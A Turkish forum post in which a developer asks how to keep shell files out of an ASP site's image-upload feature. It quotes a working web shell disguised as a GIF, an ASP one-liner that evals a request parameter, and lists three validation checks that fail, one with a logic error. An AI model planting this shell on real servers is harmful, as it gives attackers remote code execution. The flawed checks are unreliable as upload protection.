Merhaba arkadaşlar. hazırlamakta olduğum bir sitenin yönetim panelinde resim yükleme işlemi yapacağım resim yüklemek veya boyutlandırmakta hiçbir sorun yok. ancak site dosyalarına erişmek isteyen kötü niyetli kullanıcı yada 3. kişilerin shell dosyalarının yüklenmesini engelleyemedim. Yani Normal resimleri yükleyip istediğim boyutlara getirerek kaydediyorum ama uzantısı jpg yada gif olarak kaydedilmiş kod dosyalarını da yüklüyor.
uzantısı jpg olarak değiştirilmiş örnek bir shell kod dosyası var
GIF89a
<%response.write("a1"&"b2"&"c3"&"d4")&eval(request("Teks0"))%>aşağıdaki şekillerde filtrelemeye çalıştım ama olmadı shel dosyasını normal resim dosyası gibi görüyor ve yüklüyor.
Denedim işe yaramadı:
if file.ImageType = "unknown" then
response.write "Resim Dosyası Değil"
end if
uzantı sorguladım bu da işe yaramadı
if File.Ext <> ".jpg" then
response.write "Resim Dosyası Değil"
end if
En son da bunu denedim yine olmadı
if File.ContentType <> "image/jpeg" or File.ContentType <> "image/png" THEN
response.write "Resim Dosyası Değil"
end if
varmı bu işe bir çözüm bulan